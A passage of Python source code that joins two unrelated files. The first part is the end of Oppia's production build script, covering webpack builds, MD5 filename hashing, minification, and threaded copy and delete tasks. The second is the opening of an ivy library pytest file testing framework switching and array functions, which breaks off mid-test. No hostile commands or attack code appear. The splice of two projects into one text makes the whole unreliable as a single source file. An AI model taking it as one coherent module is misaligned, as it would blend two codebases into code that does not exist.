dependency_filepaths['fonts'], webfonts_dir))
def build_using_webpack(config_path):
"""Execute webpack build process. This takes all TypeScript files we have in
/templates and generates JS bundles according to the require() imports
and also compiles HTML pages into the /backend_prod_files/webpack_bundles
folder. The files are later copied into /build/webpack_bundles.
Args:
config_path: str. Webpack config to be used for building.
"""
python_utils.PRINT('Building webpack')
cmd = '%s %s --config %s' % (
common.NODE_BIN_PATH, WEBPACK_FILE, config_path)
subprocess.check_call(cmd, shell=True)
def hash_should_be_inserted(filepath):
"""Returns if the file should be renamed to include hash in
the path.
Args:
filepath: str. Path relative to directory we are currently building.
Returns:
bool. True if filepath should contain hash else False.
"""
return not any(
fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_NOT_TO_RENAME)
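# Minimal sketch of the fnmatch check above, assuming (hypothetically) that
# FILEPATHS_NOT_TO_RENAME contains a pattern such as '*.py':
#
#     import fnmatch
#     fnmatch.fnmatch('scripts/build.py', '*.py')   # True  -> no hash inserted
#     fnmatch.fnmatch('pages/base.html', '*.py')    # False -> hash inserted
#
# A path matching any pattern keeps its original name; every other path gets
# a content hash inserted into its filename.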
def should_file_be_built(filepath):
"""Determines if the file should be built.
- JS files: Returns False if filepath matches with pattern in
JS_FILENAME_SUFFIXES_TO_IGNORE or is in JS_FILEPATHS_NOT_TO_BUILD,
else returns True.
- Python files: Returns False if filepath ends with _test.py, else
returns True.
- TS files: Returns False.
- Other files: Returns False if filepath matches with pattern in
GENERAL_FILENAMES_TO_IGNORE, else returns True.
Args:
filepath: str. Path relative to the directory we are currently building.
Returns:
bool. True if filepath should be built, else False.
"""
if filepath.endswith('.js'):
return all(
not filepath.endswith(p) for p in JS_FILENAME_SUFFIXES_TO_IGNORE)
elif filepath.endswith('_test.py'):
return False
elif filepath.endswith('.ts'):
return False
else:
return not any(
filepath.endswith(p) for p in GENERAL_FILENAMES_TO_IGNORE)
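# Illustrative outcomes of the filter above (paths are hypothetical):
#
#     should_file_be_built('core/templates/app.ts')          # False: TS is handled by webpack
#     should_file_be_built('core/controllers/base_test.py')  # False: Python test file
#     should_file_be_built('core/templates/app.js')          # True, unless the path ends with
#                                                             # a suffix in
#                                                             # JS_FILENAME_SUFFIXES_TO_IGNORE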
def generate_copy_tasks_to_copy_from_source_to_target(
source, target, file_hashes):
"""Generate copy task for each file in source directory, excluding files
with extensions in FILE_EXTENSIONS_TO_IGNORE. Insert hash from hash dict
into the destination filename.
Args:
source: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target: str. Path relative to /oppia directory of directory where
to copy the files and directories.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
deque(Thread). A deque that contains all copy tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Copying into %s' % os.path.join(os.getcwd(), target))
copy_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT('Copying %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
# Python files should not be copied to final build directory.
if not any(
source_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
target_path = source_path
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
relative_path = common.convert_to_posixpath(
os.path.relpath(source_path, source))
if (hash_should_be_inserted(source + relative_path) and
relative_path in file_hashes):
relative_path = (
_insert_hash(relative_path, file_hashes[relative_path]))
target_path = os.path.join(os.getcwd(), target, relative_path)
ensure_directory_exists(target_path)
copy_task = threading.Thread(
target=safe_copy_file,
args=(source_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def is_file_hash_provided_to_frontend(filepath):
"""Returns if the hash for the filepath should be provided to the frontend.
Args:
filepath: str. Relative path to the file.
Returns:
bool. True if file hash should be provided to the frontend else False.
"""
return any(
fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_PROVIDED_TO_FRONTEND)
def generate_md5_hash(filepath):
"""Returns md5 hash of file.
Args:
filepath: str. Absolute path to the file.
Returns:
str. Hexadecimal hash of specified file.
"""
m = hashlib.md5()
with python_utils.open_file(filepath, 'rb', encoding=None) as f:
while True:
buf = f.read(HASH_BLOCK_SIZE)
if not buf:
break
m.update(buf)
return m.hexdigest()
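# A minimal, self-contained sketch of the chunked-hashing pattern used above;
# the file path is hypothetical. Reading in fixed-size chunks keeps memory
# usage flat even for large binary assets:
#
#     import hashlib
#     digest = hashlib.md5()
#     with open('assets/images/some_large_image.png', 'rb') as f:
#         for chunk in iter(lambda: f.read(1 << 20), b''):
#             digest.update(chunk)
#     digest.hexdigest()   # 32-character hex string, e.g. '240933e7...'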
def get_filepaths_by_extensions(source_dir, file_extensions):
"""Return list of filepaths in a directory with certain extensions,
excluding filepaths that should not be built.
Args:
source_dir: str. Root directory to be walked.
file_extensions: tuple(str). Tuple of file extensions.
Returns:
list(str). List of filepaths with specified extensions.
"""
filepaths = []
for root, _, filenames in os.walk(source_dir):
for filename in filenames:
filepath = os.path.join(root, filename)
relative_filepath = os.path.relpath(filepath, source_dir)
if should_file_be_built(filepath) and any(
filename.endswith(p) for p in file_extensions):
filepaths.append(relative_filepath)
return filepaths
def get_file_hashes(directory_path):
"""Returns hashes of all files in directory tree, excluding files with
extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be built.
Args:
directory_path: str. Root directory of the tree.
Returns:
dict(str, str). Dictionary with keys specifying file paths and values
specifying file hashes.
"""
file_hashes = dict()
python_utils.PRINT(
'Computing hashes for files in %s'
% os.path.join(os.getcwd(), directory_path))
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), directory_path)):
for filename in filenames:
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
complete_filepath = common.convert_to_posixpath(
os.path.join(root, filename))
relative_filepath = common.convert_to_posixpath(os.path.relpath(
complete_filepath, directory_path))
file_hashes[relative_filepath] = generate_md5_hash(
complete_filepath)
return file_hashes
def filter_hashes(file_hashes):
"""Filters hashes that should be provided to the frontend
and prefixes "/" in front of the keys.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
dict(str, str). Filtered dictionary of only filepaths that should be
provided to the frontend.
"""
filtered_hashes = dict()
for filepath, file_hash in file_hashes.items():
if is_file_hash_provided_to_frontend(filepath):
filtered_hashes['/' + filepath] = file_hash
return filtered_hashes
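# Example input/output for filter_hashes, assuming (hypothetically) that
# 'images/logo.png' matches a pattern in FILEPATHS_PROVIDED_TO_FRONTEND and
# 'build.py' does not:
#
#     filter_hashes({
#         'images/logo.png': '240933e7564bd72a4dde42ee23260c5f',
#         'build.py': 'ffffffffffffffffffffffffffffffff',
#     })
#     # -> {'/images/logo.png': '240933e7564bd72a4dde42ee23260c5f'}
#
# Note the leading '/' prepended to every key that survives the filter.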
def save_hashes_to_file(file_hashes):
"""Return JS code that loads hashes needed for frontend into variable.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
"""
# Only some of the hashes are needed in the frontend.
filtered_hashes = filter_hashes(file_hashes)
ensure_directory_exists(HASHES_JSON_FILEPATH)
with python_utils.open_file(HASHES_JSON_FILEPATH, 'w+') as hashes_json_file:
hashes_json_file.write(
python_utils.UNICODE(
json.dumps(filtered_hashes, ensure_ascii=False)))
hashes_json_file.write(u'\n')
def minify_func(source_path, target_path, filename):
"""Call the appropriate functions to handle different types of file
formats:
- HTML files: Remove whitespace, interpolate paths in the HTML file from
the source directory to include hashes, and save the edited file to the
target directory.
- CSS or JS files: Minify and save at target directory.
- Other files: Copy the file from source directory to target directory.
"""
skip_minify = any(
filename.endswith(p) for p in JS_FILENAME_SUFFIXES_NOT_TO_MINIFY)
if filename.endswith('.html'):
python_utils.PRINT('Building %s' % source_path)
with python_utils.open_file(source_path, 'r+') as source_html_file:
with python_utils.open_file(
target_path, 'w+') as minified_html_file:
process_html(source_html_file, minified_html_file)
elif ((filename.endswith('.css') or filename.endswith('.js')) and
not skip_minify):
python_utils.PRINT('Minifying %s' % source_path)
_minify(source_path, target_path)
else:
python_utils.PRINT('Copying %s' % source_path)
safe_copy_file(source_path, target_path)
def _execute_tasks(tasks, batch_size=24):
"""Starts all tasks and checks the results.
Runs no more than 'batch_size' tasks at a time.
"""
remaining_tasks = collections.deque(tasks)
currently_running_tasks = []
while remaining_tasks or currently_running_tasks:
if currently_running_tasks:
for task in collections.deque(currently_running_tasks):
if not task.is_alive():
currently_running_tasks.remove(task)
while remaining_tasks and len(currently_running_tasks) < batch_size:
task = remaining_tasks.popleft()
currently_running_tasks.append(task)
try:
task.start()
except RuntimeError:
raise OSError('threads can only be started once')
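# A minimal sketch of how _execute_tasks is driven by the callers below; the
# worker function and its arguments are hypothetical. Callers queue up
# *unstarted* threading.Thread objects and let this helper start them in
# batches of at most batch_size:
#
#     def _copy_one(src, dst):   # hypothetical worker
#         pass
#
#     tasks = collections.deque(
#         threading.Thread(target=_copy_one, args=(src, dst))
#         for src, dst in [('a.css', 'out/a.css'), ('b.js', 'out/b.js')])
#     _execute_tasks(tasks, batch_size=2)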
def generate_build_tasks_to_build_all_files_in_directory(source, target):
"""This function queues up tasks to build all files in a directory,
excluding files that should not be built.
Args:
source: str. Path relative to /oppia of directory containing source
files and directories to be built.
target: str. Path relative to /oppia of directory where the built files
and directories will be saved to.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Generating into %s' % os.path.join(os.getcwd(), target))
build_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT(
'Building directory %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
target_path = source_path.replace(source, target)
ensure_directory_exists(target_path)
if should_file_be_built(source_path):
task = threading.Thread(
target=minify_func,
args=(source_path, target_path, filename,))
build_tasks.append(task)
return build_tasks
def generate_build_tasks_to_build_files_from_filepaths(
source_path, target_path, filepaths):
"""This function queues up build tasks to build files from a list of
filepaths, excluding files that should not be built.
Args:
source_path: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target_path: str. Path relative to /oppia directory of directory where
to copy the files and directories.
filepaths: list(str). List of filepaths to be built.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
build_tasks = collections.deque()
for filepath in filepaths:
source_file_path = os.path.join(source_path, filepath)
target_file_path = os.path.join(target_path, filepath)
ensure_directory_exists(target_file_path)
if should_file_be_built(source_file_path):
task = threading.Thread(
target=minify_func,
args=(
source_file_path, target_file_path, filepath,))
build_tasks.append(task)
return build_tasks
def generate_delete_tasks_to_remove_deleted_files(
source_dir_hashes, staging_directory):
"""This function walks the staging directory and queues up deletion tasks to
remove files that are not in the hash dict i.e. remaining files in staging
directory that have since been deleted from source directory. Files with
extensions in FILE_EXTENSIONS_TO_IGNORE will be excluded.
Args:
source_dir_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
staging_directory: str. Path relative to /oppia directory of directory
containing files and directories to be walked.
Returns:
deque(Thread). A deque that contains all delete tasks
queued to be processed.
"""
python_utils.PRINT(
'Scanning directory %s to remove deleted files' % staging_directory)
delete_tasks = collections.deque()
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), staging_directory)):
for filename in filenames:
target_path = os.path.join(root, filename)
# Ignore files with certain extensions.
if not any(
target_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# On Windows the path is on Windows-Style, while the path in
# hashes is in posix style, we need to convert it so the check
# can run correctly.
relative_path = common.convert_to_posixpath(
os.path.relpath(target_path, staging_directory))
# Remove file found in staging directory but not in source
# directory, i.e. file not listed in hash dict.
if relative_path not in source_dir_hashes:
python_utils.PRINT(
'Unable to find %s in file hashes, deleting file'
% target_path)
task = threading.Thread(
target=safe_delete_file, args=(target_path,))
delete_tasks.append(task)
return delete_tasks
def get_recently_changed_filenames(source_dir_hashes, out_dir):
"""Compare hashes of source files and built files. Return a list of
filenames that were recently changed. Skips files that are not supposed to
be built or that are already built.
Args:
source_dir_hashes: dict(str, str). Dictionary of hashes of files
to be built.
out_dir: str. Path relative to /oppia where built files are located.
Returns:
list(str). List of filenames expected to be re-hashed.
"""
# Hashes are created based on files' contents and are inserted between
# the filenames and their extensions,
# e.g base.240933e7564bd72a4dde42ee23260c5f.html
# If a file gets edited, a different MD5 hash is generated.
recently_changed_filenames = []
# Currently, Python files and HTML files are always re-built.
file_extensions_not_to_track = ('.html', '.py',)
for filename, md5_hash in source_dir_hashes.items():
# Skip files that are already built or should not be built.
if should_file_be_built(filename) and not any(
filename.endswith(p) for p in file_extensions_not_to_track):
final_filepath = _insert_hash(
os.path.join(out_dir, filename), md5_hash)
if not os.path.isfile(final_filepath):
# Filename with provided hash cannot be found, this file has
# been recently changed or created since last build.
recently_changed_filenames.append(filename)
if recently_changed_filenames:
python_utils.PRINT(
'The following files will be rebuilt due to recent changes: %s'
% recently_changed_filenames)
return recently_changed_filenames
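# Worked example of the staleness check above (filename and hash value are
# hypothetical):
#
#     md5_hash = '240933e7564bd72a4dde42ee23260c5f'
#     final_filepath = _insert_hash(
#         os.path.join(out_dir, 'css/oppia.css'), md5_hash)
#     # -> '<out_dir>/css/oppia.240933e7564bd72a4dde42ee23260c5f.css'
#     # If that exact file is missing from out_dir, 'css/oppia.css' is treated
#     # as new or modified and is queued for a rebuild. HTML and Python files
#     # never reach this check because they are always rebuilt.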
def generate_build_tasks_to_build_directory(dirnames_dict):
"""This function queues up build tasks to build all files in source
directory if there is no existing staging directory. Otherwise, selectively
queue up build tasks to build recently changed files.
Args:
dirnames_dict: dict(str, str). This dict should contain three keys,
with corresponding values as follows:
- 'dev_dir': the directory that contains source files to be built.
- 'staging_dir': the directory that contains minified files waiting
for final copy process.
- 'out_dir': the final directory that contains built files with hash
inserted into filenames.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
source_dir = dirnames_dict['dev_dir']
staging_dir = dirnames_dict['staging_dir']
out_dir = dirnames_dict['out_dir']
build_tasks = collections.deque()
if not os.path.isdir(staging_dir):
# If there is no staging dir, perform build process on all files.
python_utils.PRINT('Creating new %s folder' % staging_dir)
ensure_directory_exists(staging_dir)
build_tasks += generate_build_tasks_to_build_all_files_in_directory(
source_dir, staging_dir)
else:
# If staging dir exists, rebuild all HTML and Python files.
file_extensions_to_always_rebuild = ('.html', '.py',)
python_utils.PRINT(
'Staging dir exists, re-building all %s files'
% ', '.join(file_extensions_to_always_rebuild))
filenames_to_always_rebuild = get_filepaths_by_extensions(
source_dir, file_extensions_to_always_rebuild)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, filenames_to_always_rebuild)
dev_dir_hashes = get_file_hashes(source_dir)
source_hashes = {}
source_hashes.update(dev_dir_hashes)
# Clean up files in staging directory that cannot be found in file
# hashes dictionary.
_execute_tasks(generate_delete_tasks_to_remove_deleted_files(
source_hashes, staging_dir))
python_utils.PRINT(
'Getting files that have changed between %s and %s'
% (source_dir, out_dir))
recently_changed_filenames = get_recently_changed_filenames(
dev_dir_hashes, out_dir)
if recently_changed_filenames:
python_utils.PRINT(
'Re-building recently changed files at %s' % source_dir)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, recently_changed_filenames)
else:
python_utils.PRINT(
'No changes detected. Using previously built files.')
return build_tasks
def _verify_filepath_hash(relative_filepath, file_hashes):
"""Ensure that hashes in filepaths match with the hash entries in hash
dict.
Args:
relative_filepath: str. Filepath that is relative from /build.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Raises:
ValueError. The hash dict is empty.
ValueError. Filepath has less than 2 partitions after splitting by '.'
delimiter.
ValueError. The filename does not contain hash.
KeyError. The filename's hash cannot be found in the hash dict.
"""
# Final filepath example:
# pages/base.240933e7564bd72a4dde42ee23260c5f.html.
if not file_hashes:
raise ValueError('Hash dict is empty')
filename_partitions = relative_filepath.split('.')
if len(filename_partitions) < 2:
raise ValueError('Filepath has less than 2 partitions after splitting')
hash_string_from_filename = filename_partitions[-2]
# Ensure hash string obtained from filename follows MD5 hash format.
if not re.search(r'([a-fA-F\d]{32})', relative_filepath):
if relative_filepath not in file_hashes:
return
raise ValueError(
'%s is expected to contain MD5 hash' % relative_filepath)
if hash_string_from_filename not in file_hashes.values():
raise KeyError(
'Hash from file named %s does not match hash dict values' %
relative_filepath)
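# Worked examples of the checks above (hash values are hypothetical):
#
#     hashes = {'pages/base.html': '240933e7564bd72a4dde42ee23260c5f'}
#     _verify_filepath_hash(
#         'pages/base.240933e7564bd72a4dde42ee23260c5f.html', hashes)  # passes
#     _verify_filepath_hash(
#         'pages/base.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.html', hashes)  # KeyError
#     _verify_filepath_hash('pages/base.html', hashes)                 # ValueError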
def _verify_hashes(output_dirnames, file_hashes):
"""Verify a few metrics after build process finishes:
1) The hashes in filenames belongs to the hash dict.
2) hashes.json, third_party.min.css and third_party.min.js are built and
hashes are inserted.
Args:
output_dirnames: list(str). List of directory paths that contain
built files.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
"""
# Make sure that hashed file name matches with current hash dict.
for built_dir in output_dirnames:
for root, _, filenames in os.walk(built_dir):
for filename in filenames:
parent_dir = os.path.basename(root)
converted_filepath = os.path.join(
THIRD_PARTY_GENERATED_DEV_DIR, parent_dir, filename)
if hash_should_be_inserted(converted_filepath):
# Obtain the same filepath format as the hash dict's key.
relative_filepath = os.path.relpath(
os.path.join(root, filename), built_dir)
_verify_filepath_hash(relative_filepath, file_hashes)
hash_final_filename = _insert_hash(
HASHES_JSON_FILENAME, file_hashes[HASHES_JSON_FILENAME])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_js_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_css_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)])
_ensure_files_exist([
os.path.join(ASSETS_OUT_DIR, hash_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_js_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_css_final_filename)])
def generate_hashes():
"""Generates hashes for files."""
# The keys for hashes are filepaths relative to the subfolders of the future
# /build folder. This is so that the replacing inside the HTML files works
# correctly.
hashes = dict()
# Create hashes for all directories and files.
hash_dirs = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir'],
THIRD_PARTY_GENERATED_DEV_DIR]
for hash_dir in hash_dirs:
hashes.update(get_file_hashes(hash_dir))
# Save hashes as JSON and write the JSON into JS file
# to make the hashes available to the frontend.
save_hashes_to_file(hashes)
# Update hash dict with newly created hashes.json.
hashes.update(
{HASHES_JSON_FILENAME: generate_md5_hash(HASHES_JSON_FILEPATH)})
# Make sure /assets/hashes.json is available to the frontend.
_ensure_files_exist([HASHES_JSON_FILEPATH])
return hashes
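# Illustrative shape of the returned dict; the paths and hash values below
# are hypothetical:
#
#     {
#         'images/logo.png': '240933e7564bd72a4dde42ee23260c5f',
#         'css/oppia.css': '1b671a64440d6f79a3d0ae07b7e16028',
#         'hashes.json': '9e107d9d372bb6826bd81d3542a419d6',
#     }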
def generate_build_directory(hashes):
"""Generates hashes for files. Minifies files and interpolates paths
in HTMLs to include hashes. Renames the files to include hashes and copies
them into build directory.
"""
python_utils.PRINT('Building Oppia in production mode...')
build_tasks = collections.deque()
copy_tasks = collections.deque()
# Build files in /extensions and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
EXTENSIONS_DIRNAMES_TO_DIRPATHS)
# Minify all template files and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS)
_execute_tasks(build_tasks)
# Copy all files from staging directory to production directory.
copy_input_dirs = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['staging_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['staging_dir'],
THIRD_PARTY_GENERATED_DEV_DIR,
WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
copy_output_dirs = [
ASSETS_OUT_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir'],
THIRD_PARTY_GENERATED_OUT_DIR, WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
assert len(copy_input_dirs) == len(copy_output_dirs)
for i in python_utils.RANGE(len(copy_input_dirs)):
safe_delete_directory_tree(copy_output_dirs[i])
copy_tasks += generate_copy_tasks_to_copy_from_source_to_target(
copy_input_dirs[i], copy_output_dirs[i], hashes)
_execute_tasks(copy_tasks)
_verify_hashes(copy_output_dirs, hashes)
source_dirs_for_assets = [ASSETS_DEV_DIR, THIRD_PARTY_GENERATED_DEV_DIR]
output_dirs_for_assets = [ASSETS_OUT_DIR, THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(source_dirs_for_assets, output_dirs_for_assets)
source_dirs_for_third_party = [THIRD_PARTY_GENERATED_DEV_DIR]
output_dirs_for_third_party = [THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(
source_dirs_for_third_party, output_dirs_for_third_party)
source_dirs_for_webpack = [WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
output_dirs_for_webpack = [WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(
source_dirs_for_webpack, output_dirs_for_webpack)
source_dirs_for_extensions = [
EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir']]
output_dirs_for_extensions = [EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(source_dirs_for_extensions, output_dirs_for_extensions)
source_dirs_for_templates = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir']]
output_dirs_for_templates = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(source_dirs_for_templates, output_dirs_for_templates)
python_utils.PRINT('Build completed.')
def main(args=None):
"""The main method of this script."""
options = _PARSER.parse_args(args=args)
if options.maintenance_mode and not options.prod_env:
raise Exception(
'maintenance_mode should only be enabled in prod build.')
# Regenerate /third_party/generated from scratch.
safe_delete_directory_tree(THIRD_PARTY_GENERATED_DEV_DIR)
build_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
# If minify_third_party_libs_only is set to True, skips the rest of the
# build process once third party libs are minified.
if options.minify_third_party_libs_only:
if options.prod_env:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
return
else:
raise Exception(
'minify_third_party_libs_only should not be '
'set in non-prod env.')
modify_constants(
prod_env=options.prod_env,
emulator_mode=not options.deploy_mode,
maintenance_mode=options.maintenance_mode)
if options.prod_env:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
hashes = generate_hashes()
if options.deparallelize_terser:
if options.source_maps:
raise Exception(
'source_maps flag shouldn\'t be used with '
'deparallelize_terser flag.')
build_using_webpack(WEBPACK_TERSER_CONFIG)
elif options.source_maps:
build_using_webpack(WEBPACK_PROD_SOURCE_MAPS_CONFIG)
else:
build_using_webpack(WEBPACK_PROD_CONFIG)
generate_app_yaml(
deploy_mode=options.deploy_mode,
maintenance_mode=options.maintenance_mode)
generate_build_directory(hashes)
save_hashes_to_file(dict())
# The 'no coverage' pragma is used as this line is un-testable. This is because
# it will only be called when build.py is used as a script.
if __name__ == '__main__': # pragma: no cover
main()
test_general.py
"""
Collection of tests for unified general functions
"""
# global
import os
import math
import time
import einops
import pytest
import threading
import numpy as np
from numbers import Number
from collections.abc import Sequence
import torch.multiprocessing as multiprocessing
# local
import ivy
import ivy.functional.backends.numpy
import ivy.functional.backends.jax
import ivy.functional.backends.tensorflow
import ivy.functional.backends.torch
import ivy.functional.backends.mxnet
import ivy_tests.test_ivy.helpers as helpers
# Helpers #
# --------#
def _get_shape_of_list(lst, shape=()):
if not lst:
return []
if not isinstance(lst, Sequence):
return shape
if isinstance(lst[0], Sequence):
l = len(lst[0])
if not all(len(item) == l for item in lst):
msg = 'not all lists have the same length'
raise ValueError(msg)
shape += (len(lst),)
shape = _get_shape_of_list(lst[0], shape)
return shape
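# Doctest-style sketch of the helper above: the returned shape mirrors the
# one numpy would report for the same nesting, and ragged inner lists raise.
#
#     _get_shape_of_list([[1., 2.], [3., 4.], [5., 6.]])   # -> (3, 2)
#     _get_shape_of_list([])                               # -> []
#     _get_shape_of_list([[1.], [2., 3.]])                 # raises ValueError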
# Tests #
# ------#
# set_framework
@pytest.mark.parametrize(
"fw_str", ['numpy', 'jax', 'torch', 'mxnet'])
def test_set_framework(fw_str, dev, call):
ivy.set_framework(fw_str)
ivy.unset_framework()
# use_framework
def test_use_within_use_framework(dev, call):
with ivy.functional.backends.numpy.use:
pass
with ivy.functional.backends.jax.use:
pass
with ivy.functional.backends.tensorflow.use:
pass
with ivy.functional.backends.torch.use:
pass
with ivy.functional.backends.mxnet.use:
pass
@pytest.mark.parametrize(
"allow_duplicates", [True, False])
def test_match_kwargs(allow_duplicates):
def func_a(a, b, c=2):
pass
func_b = lambda a, d, e=5: None
class ClassA:
def __init__(self, c, f, g=3):
pass
kwargs = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6}
kwfa, kwfb, kwca = ivy.match_kwargs(kwargs, func_a, func_b, ClassA, allow_duplicates=allow_duplicates)
if allow_duplicates:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'a': 0, 'd': 3, 'e': 4}
assert kwca == {'c': 2, 'f': 5, 'g': 6}
else:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'d': 3, 'e': 4}
assert kwca == {'f': 5, 'g': 6}
def test_get_referrers_recursive(dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: work out why this test fails in wrapped mode
pytest.skip()
class SomeClass:
def __init__(self):
self.x = [1, 2]
self.y = [self.x]
some_obj = SomeClass()
refs = ivy.get_referrers_recursive(some_obj.x)
ref_keys = refs.keys()
assert len(ref_keys) == 3
assert 'repr' in ref_keys
assert refs['repr'] == '[1,2]'
y_id = str(id(some_obj.y))
y_refs = refs[y_id]
assert y_refs['repr'] == '[[1,2]]'
some_obj_dict_id = str(id(some_obj.__dict__))
assert y_refs[some_obj_dict_id] == 'tracked'
dict_refs = refs[some_obj_dict_id]
assert dict_refs['repr'] == "{'x':[1,2],'y':[[1,2]]}"
some_obj_id = str(id(some_obj))
some_obj_refs = dict_refs[some_obj_id]
assert some_obj_refs['repr'] == str(some_obj).replace(' ', '')
assert len(some_obj_refs) == 1
# array
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"from_numpy", [True, False])
def test_array(object_in, dtype, from_numpy, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# to numpy
if from_numpy:
object_in = np.array(object_in)
# smoke test
ret = ivy.array(object_in, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(call(ivy.array, object_in, dtype, dev), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.array)
# copy array
@pytest.mark.parametrize(
"x", [[0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_copy_array(x, dtype, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# smoke test
x = ivy.array(x, dtype, dev)
ret = ivy.copy_array(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(x))
assert id(x) != id(ret)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.copy_array)
# array_equal
@pytest.mark.parametrize(
"x0_n_x1_n_res", [([0.], [0.], True), ([0.], [1.], False),
([[0.], [1.]], [[0.], [1.]], True),
([[0.], [1.]], [[1.], [2.]], False)])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_array_equal(x0_n_x1_n_res, dtype, dev, call):
if call in [helpers.mx_call] and dtype in ['int16', 'bool']:
# mxnet does not support int16, and does not support bool for broadcast_equal method used
pytest.skip()
x0, x1, true_res = x0_n_x1_n_res
# smoke test
x0 = ivy.array(x0, dtype, dev)
x1 = ivy.array(x1, dtype, dev)
res = ivy.array_equal(x0, x1)
# type test
